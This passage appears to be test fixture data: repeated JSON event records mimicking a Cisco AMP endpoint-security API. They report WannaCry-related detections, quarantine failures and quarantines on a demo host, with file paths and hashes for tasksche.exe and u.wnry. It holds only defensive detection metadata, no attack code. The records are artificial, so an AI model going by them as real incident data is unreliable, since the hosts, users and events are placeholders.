Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":565000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769884","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":206000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769883","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":128000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769882","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835282","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835281","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835280","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":364000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":878000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":754000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 